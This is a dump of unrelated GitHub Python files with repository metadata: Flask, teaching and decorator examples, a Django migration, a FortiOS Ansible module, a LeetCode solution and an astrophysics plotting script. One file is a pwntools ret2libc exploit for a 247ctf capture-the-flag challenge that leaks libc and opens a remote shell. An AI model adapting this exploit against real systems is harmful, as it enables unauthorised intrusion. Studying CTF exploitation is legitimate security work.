    # Runs the ultrasonic-sensor script and returns its stdout as the body.
    # NOTE(review): os.popen spawns a shell per request and the stream is
    # never closed — consider subprocess.run with a list argv instead.
    stream = os.popen("python ultrasonico_html.py")
    return stream.read()

app.run(host="192.168.100.48")
#http://192.168.100.48:5000/saludar
| [
"badillo.soft@hotmail.com"
] | badillo.soft@hotmail.com |
5584ee69c15cd5aacd051f6f1e7bfd3f031a0c37 | 8e23cbf08a8c5d966f642ef89a25309392acdb36 | /python教学/装饰器.py | e6b6e1325f7f6353583cdae58f87ff140bebf4a3 | [] | no_license | gyhd/python_study | ba94eca3aa391c56cdb34a48bcb6cd32581703e0 | 3b8c99179903d9c81b70d65c8df3023449394f57 | refs/heads/master | 2022-11-27T18:00:20.259082 | 2020-07-11T09:49:10 | 2020-07-11T09:49:10 | 248,500,662 | 3 | 1 | null | 2022-11-22T05:08:17 | 2020-03-19T12:44:35 | Jupyter Notebook | UTF-8 | Python | false | false | 1,499 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Apr 29 15:48:22 2019
@author: Maibenben
"""
"""
def use_logging(func):
def wrapper(*args,**kwargs):
kwarg_values=[i for i in kwarg_values()]
for arg in list(args) + kwarg_values:
if not isinstance(arg,int):
return print('wrong input')
return func(*args,**kwargs)
return wrapper
@use_logging
def foo(a,b):
return (a+b)
foo(5,1)
"""
import hello
print('I am python')

# A class used as a decorator: wrapping happens in __init__, the wrapped
# call (with before/after messages) in __call__.
class Foo(object):
    def __init__(self,func):
        self.func=func
    def __call__(self):
        print("%s is running"%self.func)
        self.func()
        print("%s is end"%self.func)
@Foo
def bar():
    print('bar')
bar()

class people:
    def __init__(self,n,a):
        # Double-underscore attributes are name-mangled (pseudo-private).
        self.__name=n
        self.__age=a
    @property
    def age(self):
        # NOTE(review): print() returns None, so reading p.age prints the
        # value but evaluates to None — likely meant `return self.__age`.
        return print(self.__age)
    @age.setter
    def age(self,age):
        self.__age=age
    def speak(self):
        print("%s says: I am %d years old"%(self.__name,self.__age))
# Instantiate and exercise the property setter.
p=people('fiona',20)
p.age=50
p.speak()

class A(object):
    bar=1
    def func1(self):
        print('foo')
    @classmethod
    def func2(cls):
        print('func2')
        print(cls.bar)
        cls().func1() # call the instance method func1
A.func2() # a classmethod needs no instantiation

class C(object):
    @staticmethod
    def f():
        print('fiona')
C.f() # a static method needs no instance
a=C()
a.f() # but it can also be called through an instance
| [
"2578278753@qq.com"
] | 2578278753@qq.com |
855b7ea3ed9f6b80d4674bf06c86a849cf414ce6 | 45b4687f1a9bc885666c06ea2c6b105e5058a7ae | /pyavrutils/examples/usage_ard.py | 15cb144b0f5e90d4f551e9711bed305552c40885 | [
"BSD-2-Clause"
] | permissive | ponty/pyavrutils | 5e14e0d2275235d87ed5668b632b16d0ea05711d | 460ae240b1360241e6867684300bd5f9a23b057b | refs/heads/master | 2020-12-24T16:06:55.990646 | 2020-05-02T09:00:26 | 2020-05-02T09:00:26 | 2,108,946 | 10 | 2 | null | null | null | null | UTF-8 | Python | false | false | 569 | py | from entrypoint2 import entrypoint
code = '''
from pyavrutils import Arduino
cc = Arduino(board='mini')
cc.build('void setup(){};void loop(){}')
cc.output
cc.size()
cc.size().program_bytes
cc.board='pro'
cc.build('void setup(){};void loop(){}')
cc.output
cc.size().program_bytes
cc.warnings
'''
@entrypoint
def main():
    # Replay each line of the example session in `code`, echoing REPL-style.
    for line in code.strip().splitlines():
        print('>>> %s' % line)
        try:
            # Expressions are eval'd so their value can be shown...
            s = eval(line)
            if s:
                print(s)
        except SyntaxError:
            # ...statements (e.g. assignments) fall back to exec.
            exec(line)
| [
"ponty@home"
] | ponty@home |
1024e3e86e782595371ff6d7a72d2c358bef7c38 | 8096e140f0fd38b9492e0fcf307990b1a5bfc3dd | /Python/madlibs/version1.py | 030da60671377a43b1498010dbff0898eb122bb7 | [] | no_license | perennialAutodidact/PDXCodeGuild_Projects | 0cacd44499c0bdc0c157555fe5466df6d8eb09b6 | 28a8258eba41e1fe6c135f54b230436ea7d28678 | refs/heads/master | 2022-11-15T22:26:45.775550 | 2020-07-07T17:13:01 | 2020-07-07T17:13:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 794 | py | print("\nPlease enter: \n")
# Collect the words that fill the blanks of the story template.
adjective_1 = input("Adjective: ")
place = input("Place: ")
plural_noun = input("Plural noun: ")
adjective_2 = input("Adjective: ")
adjective_3 = input("Adjective: ")
verb_1 = input("\"ing\" verb: ")
verb_2 = input("\"ing\" verb: ")
adjective_4 = input("Adjective: ")
adjective_5 = input("Adjective: ")
noun_1 = input("Noun: ")
# Bug fix: the completed story was a bare f-string expression whose value
# was discarded — it must be printed to be shown to the player.
print(f"If you go to some {adjective_1} place like {place} , you must know how to deal with wild animals such as bears, wolves and{plural_noun} . The most important of these is the bear. There are three kinds of bear, the grizzly bear, the {adjective_2} bear and the {adjective_3} bear. Bears spend most of their time {verb_1} or {verb_2} . They look very {adjective_4} , but if you make them {adjective_5} , they might bite your {noun_1} .")
| [
"keegood8@gmail.com"
] | keegood8@gmail.com |
980e1ccc875d26d9d2310924a4cf756d9eb52c42 | 077a17b286bdd6c427c325f196eb6e16b30c257e | /07-RemoteLibcId/247ctf_non-exectuable-stack/exploit.py | 8ae0a1385c0478c8df203b33d8d459ef768279ff | [] | no_license | KurSh/remenissions_test | 626daf6e923459b44b82521aa4cb944aad0dbced | 9dec8085b62a446f7562adfeccf70f8bfcdbb738 | refs/heads/master | 2023-07-08T20:25:04.823318 | 2020-10-05T06:45:16 | 2020-10-05T06:45:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 889 | py | #!/usr/bin/env python3
from pwn import *
import os
import sf
import sys
import signal

# Stage 1: send a first ROP chain that leaks the runtime address of puts,
# so the remote libc base can be computed.
target = remote("042f9172aa4814e7.247ctf.com", 50384)
bof_payload = sf.BufferOverflow(arch=32)
bof_payload.set_input_start(0x2c)
# Absolute addresses used by the leak chain (format defined by sf).
rop_chain = [134513552, 134513981, 134520856]
bof_payload.add_rop_chain(rop_chain)
payload = bof_payload.generate_payload()
target.sendline(payload)
# Skip two lines of program output, then read the 4-byte leak.
target.recvline()
target.recvline()
leak = target.recv(4)
puts_address = u32(leak)
# 422752 — presumably the offset of puts inside the remote libc; confirm.
libc_base = puts_address - (422752)
print("libc base is: %s" % hex(libc_base))
# Stage 2: second chain built from libc-relative offsets now that the base
# is known ('libc' entries are rebased by sf via add_base).
bof_payload = sf.BufferOverflow(arch = 32)
bof_payload.add_base("libc", libc_base)
bof_payload.set_input_start(0x2c)
rop_chain = [[249104, 'libc'], b'0000', [1554639, 'libc']]
bof_payload.add_rop_chain(rop_chain)
payload = bof_payload.generate_payload()
target.sendline(payload)
# Exploit Verification starts here 15935728
# NOTE(review): `time` is not imported here — presumably re-exported by
# pwntools' star import; confirm.
time.sleep(.5)
target.interactive() | [
"ryancmeinke@gmail.com"
] | ryancmeinke@gmail.com |
5a9e2337774edfa2d38ae948f760275231a69469 | 41311e8bbed80e1f819157d24d7943c05ba6b2e6 | /quiz/p1-1.py | 6904090c9c4d88daefea5beda24e62a30c34efb8 | [] | no_license | tanglan2009/MITx6.00.2x_Introductin_Computational_Thinking_and_Data_Science | c0bb39cb0964014661823e1301f05af7837ff3c5 | 334726fca7f87eae55f5f45c3cdc4dbac02cfac4 | refs/heads/master | 2021-01-10T02:49:34.663406 | 2016-03-06T19:49:44 | 2016-03-06T19:49:44 | 53,272,724 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 136 | py | import random
def f(x):
    """Return x unchanged for non-negative integers.

    x is an integer; the fractional offset added below is under 1, so
    int() truncation discards it again for x >= 0.
    """
    offset = random.choice([0.25, 0.5, 0.75])
    return int(x + offset)
print f(1)
print f(2)
print f(3) | [
"tanglan2009@gmail.com"
] | tanglan2009@gmail.com |
c020c2f69a1976edb765483dd834de041a8b2bb9 | 3ae29d8aa791c03e9a09eb07a83a1eaf49772fb6 | /restaurant/migrations/0019_auto__del_rating.py | a4af116d7a5caeba246a44a2461a5fd07f2f124c | [] | no_license | rif/click2eat | 26ca011288b1d4f9d69c0e8ecd36fcd622eb5d0c | 1a6894a46e8bf49edfb9c16e50d925e6354ddc6a | refs/heads/master | 2020-07-11T22:47:15.756006 | 2012-05-15T16:15:22 | 2012-05-15T16:15:22 | 204,658,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,928 | py | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting model 'Rating'
db.delete_table('restaurant_rating')
def backwards(self, orm):
# Adding model 'Rating'
db.create_table('restaurant_rating', (
('delivery_time', self.gf('django.db.models.fields.SmallIntegerField')()),
('feedback', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('restaurant', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['restaurant.Unit'])),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
('quality', self.gf('django.db.models.fields.SmallIntegerField')()),
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
))
db.send_create_signal('restaurant', ['Rating'])
models = {
'restaurant.communication': {
'Meta': {'object_name': 'Communication'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'restaurant.currency': {
'Meta': {'object_name': 'Currency'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '20'})
},
'restaurant.deliverytype': {
'Meta': {'object_name': 'DeliveryType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'price': ('django.db.models.fields.FloatField', [], {})
},
'restaurant.employee': {
'Meta': {'object_name': 'Employee'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '15'}),
'start_date': ('django.db.models.fields.DateField', [], {})
},
'restaurant.interval': {
'Meta': {'object_name': 'Interval'},
'end_hour': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'schedule': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['restaurant.Schedule']"}),
'start_hour': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'weekdays': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '13'})
},
'restaurant.partnerpackage': {
'Meta': {'object_name': 'PartnerPackage'},
'details': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'restaurant.paymentmethod': {
'Meta': {'object_name': 'PaymentMethod'},
'details': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'restaurant.schedule': {
'Meta': {'object_name': 'Schedule'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'unit': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['restaurant.Unit']", 'unique': 'True'})
},
'restaurant.unit': {
'Meta': {'object_name': 'Unit'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'address': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'admin_users': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'communication': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['restaurant.Communication']", 'symmetrical': 'False'}),
'contact_person': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'currency': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'units_using_this'", 'to': "orm['restaurant.Currency']"}),
'delivery_range': ('django.db.models.fields.FloatField', [], {}),
'delivery_time': ('django.db.models.fields.IntegerField', [], {}),
'delivery_time_user': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'delivery_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['restaurant.DeliveryType']"}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'employee': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['restaurant.Employee']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'latitude': ('django.db.models.fields.FloatField', [], {}),
'logo_path': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'longitude': ('django.db.models.fields.FloatField', [], {}),
'minimum_ord_val': ('django.db.models.fields.IntegerField', [], {}),
'mobile': ('django.db.models.fields.CharField', [], {'max_length': '15'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'overall_discount': ('django.db.models.fields.FloatField', [], {}),
'package': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['restaurant.PartnerPackage']"}),
'payment_method': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['restaurant.PaymentMethod']", 'symmetrical': 'False'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '15'})
}
}
complete_apps = ['restaurant']
| [
"radu@fericean.ro"
] | radu@fericean.ro |
f392ac0672bb07b6422d2d0b1428717eff6cc3b4 | b22b0760b29d24cff24eda9d1c114094fd1a588f | /Python/Easy/1002. Find Common Characters.py | 31ed0092f8a82223904bdc350b72986f3fbb5b1f | [] | no_license | MridulGangwar/Leetcode-Solutions | bbbaa06058a7b3e7621fc54050e344c06a256080 | d41b1bbd762030733fa271316f19724d43072cd7 | refs/heads/master | 2022-03-07T12:20:33.485573 | 2022-02-21T07:22:38 | 2022-02-21T07:22:38 | 231,700,258 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 906 | py | class Solution(object):
def commonChars(self, A):
"""
:type A: List[str]
:rtype: List[str]
"""
init_d ={}
for i in A[0]:
if i not in init_d:
init_d[i]=1
else: init_d[i]+=1
for i in range(1,len(A)):
temp={}
for char in A[i]:
if char not in temp and char in init_d:
temp[char]=1
elif char in temp and char in init_d:
temp[char]+=1
for i in init_d.keys():
if i not in temp:
del init_d[i]
else:
init_d[i] = min(init_d[i],temp[i])
result=[]
for key in init_d.keys():
for i in range(init_d[key]):
result.append(key)
return result | [
"singhmridul1@gmail.com"
] | singhmridul1@gmail.com |
8870f715f7c1f62386ba321b2c3fff4410c3772b | aac418419c2ef4d10c5c4ceb607d3d8329a5f395 | /Accepted/Codeshef/CATSDOGS - Cats_and_Dogs.py | b212a7af8376b88d41f5fa6d86ecea05063d1eb3 | [] | no_license | sudhirshahu51/projects | bb13395227355ff84933b6d3a0f158ee42bcdceb | b2d8331d14d2163b20535368a60c81f6c8bc2c8f | refs/heads/master | 2021-01-01T17:09:18.654060 | 2017-04-24T10:46:15 | 2017-04-24T10:46:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 529 | py | # Code Chef Cats and Dogs problem
t = int(input()) # No. of test cases
while t:
cats, dogs, legs = map(int, input().split())
high = (cats + dogs) * 4 # when all the cats and dogs legs are touching ground
if (cats - (2 * dogs)) <= 0:
low = (dogs * 4) # only dogs legs are touching ground
else:
low = (cats - dogs) * 4 # cats no. are greater than twice of dogs
if legs % 4 == 0 and low <= legs <= high:
print('yes')
else:
print('no')
t -= 1
| [
"deveshaggrawal19@gmail.com"
] | deveshaggrawal19@gmail.com |
2af71e101ceac700047b14f879a4f1bfe9cdd8ee | 42685099f1e25e5c1db51b98546e0be495d2789f | /v6.0.2/system/fortios_system_ipip_tunnel.py | 31f4aa4a9c00a6e26f63b162ddc13d13344ebe69 | [
"Apache-2.0"
] | permissive | sxhdroid/ansible_fgt_modules | 02aaf9af33063d8178e7e898666ac9cdef150a00 | 58d02d80a8d0ff145bee226b345ad9738af523f6 | refs/heads/master | 2020-04-18T01:34:45.990750 | 2019-01-22T10:47:36 | 2019-01-22T10:47:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,097 | py | #!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2018 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# the lib use python logging can get it if the following is set in your
# Ansible config.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_system_ipip_tunnel
short_description: Configure IP in IP Tunneling in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS by
allowing the user to configure system feature and ipip_tunnel category.
Examples includes all options and need to be adjusted to datasources before usage.
Tested with FOS v6.0.2
version_added: "2.8"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate ip adress.
required: true
username:
description:
- FortiOS or FortiGate username.
required: true
password:
description:
- FortiOS or FortiGate password.
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS
protocol
type: bool
default: false
system_ipip_tunnel:
description:
- Configure IP in IP Tunneling.
default: null
suboptions:
state:
description:
- Indicates whether to create or remove the object
choices:
- present
- absent
interface:
description:
- Interface name that is associated with the incoming traffic from available options. Source system.interface.name.
local-gw:
description:
- IPv4 address for the local gateway.
name:
description:
- IPIP Tunnel name.
required: true
remote-gw:
description:
- IPv4 address for the remote gateway.
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
tasks:
- name: Configure IP in IP Tunneling.
fortios_system_ipip_tunnel:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
system_ipip_tunnel:
state: "present"
interface: "<your_own_value> (source system.interface.name)"
local-gw: "<your_own_value>"
name: "default_name_5"
remote-gw: "<your_own_value>"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: string
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: string
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: string
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: string
sample: "key1"
name:
description: Name of the table used to fulfill the request
returned: always
type: string
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: string
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: string
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: string
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: string
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: string
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: string
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
fos = None
def login(data):
host = data['host']
username = data['username']
password = data['password']
fos.debug('on')
if 'https' in data and not data['https']:
fos.https('off')
else:
fos.https('on')
fos.login(host, username, password)
def filter_system_ipip_tunnel_data(json):
option_list = ['interface', 'local-gw', 'name',
'remote-gw']
dictionary = {}
for attribute in option_list:
if attribute in json and json[attribute] is not None:
dictionary[attribute] = json[attribute]
return dictionary
def system_ipip_tunnel(data, fos):
vdom = data['vdom']
system_ipip_tunnel_data = data['system_ipip_tunnel']
filtered_data = filter_system_ipip_tunnel_data(system_ipip_tunnel_data)
if system_ipip_tunnel_data['state'] == "present":
return fos.set('system',
'ipip-tunnel',
data=filtered_data,
vdom=vdom)
elif system_ipip_tunnel_data['state'] == "absent":
return fos.delete('system',
'ipip-tunnel',
mkey=filtered_data['name'],
vdom=vdom)
def fortios_system(data, fos):
login(data)
methodlist = ['system_ipip_tunnel']
for method in methodlist:
if data[method]:
resp = eval(method)(data, fos)
break
fos.logout()
return not resp['status'] == "success", resp['status'] == "success", resp
def main():
fields = {
"host": {"required": True, "type": "str"},
"username": {"required": True, "type": "str"},
"password": {"required": False, "type": "str", "no_log": True},
"vdom": {"required": False, "type": "str", "default": "root"},
"https": {"required": False, "type": "bool", "default": "False"},
"system_ipip_tunnel": {
"required": False, "type": "dict",
"options": {
"state": {"required": True, "type": "str",
"choices": ["present", "absent"]},
"interface": {"required": False, "type": "str"},
"local-gw": {"required": False, "type": "str"},
"name": {"required": True, "type": "str"},
"remote-gw": {"required": False, "type": "str"}
}
}
}
module = AnsibleModule(argument_spec=fields,
supports_check_mode=False)
try:
from fortiosapi import FortiOSAPI
except ImportError:
module.fail_json(msg="fortiosapi module is required")
global fos
fos = FortiOSAPI()
is_error, has_changed, result = fortios_system(module.params, fos)
if not is_error:
module.exit_json(changed=has_changed, meta=result)
else:
module.fail_json(msg="Error in repo", meta=result)
if __name__ == '__main__':
main()
| [
"magonzalez@fortinet.com"
] | magonzalez@fortinet.com |
3f3bf6e43eebbc4bc557d29096041bd38f644295 | 3922557a09e8573a10328513d25c551365916b36 | /node_modules/socket.io/node_modules/socket.io-client/node_modules/ws/build/config.gypi | 55677338992d2b1cea185bf970f72d860d53170d | [
"MIT"
] | permissive | justintime170/nodeserv-test | f6b287f372f5859a78051a7f6e77ab441047bb7f | 96e435fa9682303cc9cf07fbafdb55f37d68b08d | refs/heads/master | 2016-09-05T23:46:03.891240 | 2014-08-21T07:30:13 | 2014-08-21T07:30:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,685 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 0,
"gcc_version": 44,
"host_arch": "x64",
"node_install_npm": "true",
"node_install_waf": "true",
"node_prefix": "/usr",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_unsafe_optimizations": 0,
"node_use_dtrace": "false",
"node_use_etw": "false",
"node_use_openssl": "true",
"target_arch": "x64",
"v8_no_strict_aliasing": 1,
"v8_use_snapshot": "true",
"nodedir": "/root/.node-gyp/0.8.20",
"copy_dev_lib": "true",
"save_dev": "",
"browser": "",
"viewer": "man",
"rollback": "true",
"usage": "",
"globalignorefile": "/usr/etc/npmignore",
"init_author_url": "",
"shell": "/bin/bash",
"parseable": "",
"userignorefile": "/root/.npmignore",
"cache_max": "null",
"init_author_email": "",
"sign_git_tag": "",
"ignore": "",
"long": "",
"registry": "https://registry.npmjs.org/",
"fetch_retries": "2",
"npat": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/etc/npmrc",
"always_auth": "",
"cache_lock_retries": "10",
"fetch_retry_mintimeout": "10000",
"proprietary_attribs": "true",
"coverage": "",
"json": "",
"pre": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/root/.npm-init.js",
"userconfig": "/root/.npmrc",
"npaturl": "http://npat.npmjs.org/",
"node_version": "v0.8.20",
"user": "",
"editor": "vi",
"save": "",
"tag": "latest",
"global": "",
"optional": "true",
"username": "",
"bin_links": "true",
"force": "",
"searchopts": "",
"depth": "null",
"rebuild_bundle": "true",
"searchsort": "name",
"unicode": "true",
"yes": "",
"fetch_retry_maxtimeout": "60000",
"strict_ssl": "true",
"dev": "",
"fetch_retry_factor": "10",
"group": "",
"cache_lock_stale": "60000",
"version": "",
"cache_min": "10",
"cache": "/root/.npm",
"searchexclude": "",
"color": "true",
"save_optional": "",
"user_agent": "node/v0.8.20 linux x64",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"init_version": "0.0.0",
"umask": "18",
"git": "git",
"init_author_name": "",
"onload_script": "",
"tmp": "/root/tmp",
"unsafe_perm": "",
"link": "",
"prefix": "/usr"
}
}
| [
"root@raspberrypi.(none)"
] | root@raspberrypi.(none) |
d0bf18c817e4f7f237487482234c057de31e6941 | 73189d4d0b39efe5864d25aff07d8338ab8f3110 | /devel/lib/python2.7/dist-packages/tf2_msgs/msg/_LookupTransformFeedback.py | 83b908a2db3ccc30e8952c4719a78f5af29e7c94 | [] | no_license | jungwoohan72/Multi_Robot_Search_And_Rescue | a64590a0f899682c2429400c5cb6d4d8a7d7fd99 | 3e70f9e9b895a96e045f19a05780b091c16f2e60 | refs/heads/main | 2023-07-06T14:03:58.980624 | 2021-08-01T05:15:02 | 2021-08-01T05:15:02 | 379,856,303 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,171 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from tf2_msgs/LookupTransformFeedback.msg. Do not edit."""
import codecs
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class LookupTransformFeedback(genpy.Message):
_md5sum = "d41d8cd98f00b204e9800998ecf8427e"
_type = "tf2_msgs/LookupTransformFeedback"
_has_header = False # flag to mark the presence of a Header object
_full_text = """# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
"""
__slots__ = []
_slot_types = []
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(LookupTransformFeedback, self).__init__(*args, **kwds)
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
pass
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
if python3:
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
pass
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
if python3:
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
| [
"dream4future@kaist.ac.kr"
] | dream4future@kaist.ac.kr |
c33136cba8c462e8266f910e5907785846fdc01e | 9c368c9fe78a2dd186daeed2d0714651c1c27d66 | /absorption/ml_project/analyse_spectra/plot_Nweighted_deltaTZ_leg.py | 05d0118c919d27b69595a6456dfdb4603b50129e | [] | no_license | sarahappleby/cgm | 5ff2121919e36b10069692f71fb1dc03f3678462 | 656bf308771dd3ff2f8c2e77107cdc14507c7ce7 | refs/heads/master | 2023-01-24T03:10:01.610418 | 2023-01-20T11:04:31 | 2023-01-20T11:04:31 | 160,820,718 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,422 | py | import matplotlib.pyplot as plt
from matplotlib import cm
from matplotlib.ticker import AutoMinorLocator
import numpy as np
import h5py
import pygad as pg
import sys
plt.rc('text', usetex=True)
plt.rc('font', family='serif', size=15)
if __name__ == '__main__':
model = sys.argv[1]
wind = sys.argv[2]
snap = sys.argv[3]
lines = ["H1215", "MgII2796", "CII1334", "SiIII1206", "CIV1548", "OVI1031"]
plot_lines = ['HI', 'MgII', 'CII', 'SiIII', 'CIV', 'OVI']
line_ev = np.log10([13.6, 15.04, 24.38, 33.49, 64.49, 138.1]) # in eV
adjust_x = [0.015, 0.025, 0.02, 0.025, 0.02, 0.02]
chisq_lim_dict = {'snap_151': [4., 50., 15.8, 39.8, 8.9, 4.5],
'snap_137': [3.5, 28.2, 10., 35.5, 8.0, 4.5],
'snap_125': [3.5, 31.6, 15.8, 39.8, 10., 5.6],
'snap_105': [4.5, 25.1, 25.1, 34.5, 10., 7.1],}
chisq_lim = chisq_lim_dict[f'snap_{snap}']
snapfile = f'/disk04/sapple/data/samples/{model}_{wind}_{snap}.hdf5'
s = pg.Snapshot(snapfile)
redshift = s.redshift
rho_crit = float(s.cosmology.rho_crit(z=redshift).in_units_of('g/cm**3'))
cosmic_rho = rho_crit * float(s.cosmology.Omega_b)
N_min = [12.7, 11.5, 12.8, 11.7, 12.8, 13.2]
